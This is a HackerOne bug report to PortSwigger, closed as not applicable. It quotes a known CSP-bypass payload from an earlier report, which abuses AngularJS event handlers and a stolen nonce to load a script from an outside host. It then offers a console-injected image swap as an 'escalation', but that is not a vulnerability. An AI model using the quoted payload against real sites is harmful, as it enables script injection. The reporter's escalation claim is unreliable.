CSP Bypass and escalation of https://hackerone.com/reports/2279346
High
P
PortSwigger Web Security
Submitted None
Actions:
Reported by
priyanshusharma9789
Vulnerability Details
Technical details and impact analysis
Hello Team ,
I have gone through this report https://hackerone.com/reports/2279346 and their is CSP bypass where website has implemented security in that but after this i can escalate Again CSP bypass with using different Script .
As shown in https://hackerone.com/reports/2279346 report website rectify the scripts like:
document.getElementsByTagName("div")[0].innerHTML=`<iframe srcdoc="<div lang=en ng-app=application ng-csp class=ng-scope>
<script src='https://www.google.com/recaptcha/about/js/main.min.js'></script>
<img src=x ng-on-error='w=$event.target.ownerDocument;a=w.defaultView.top.document.querySelector("[nonce]");b=w.createElement("script");b.src="//joaxcar.com/hack.js";b.nonce=a.nonce;w.body.appendChild(b)'>
</div>
">`
But their is new way where i can escalate the bug with new script which is :
var demo=document.createElement("img");
demo.src="https://i.ytimg.com/vi/0vxCFIGCqnI/maxresdefault.jpg";
document.body.innerHTML="";demo.width="1000"; demo.height="1000";
document.body.appendChild(demo);
F3074920
Steps:
Go to https://portswigger.net/
Inject the script in console tab and see the impact
In this website configuration on CSP header is not proper . In my attachment their is no header for img in CSP . So attacker can escalate the bug again with different scripts.
F3074919
Thanks
Priyanshu
## Impact
Escalate the bug with new script
CSP bypass using img script.
Report Details
Additional information and metadata
State
Closed
Substate
Not-Applicable
Submitted
Weakness
Business Logic Errors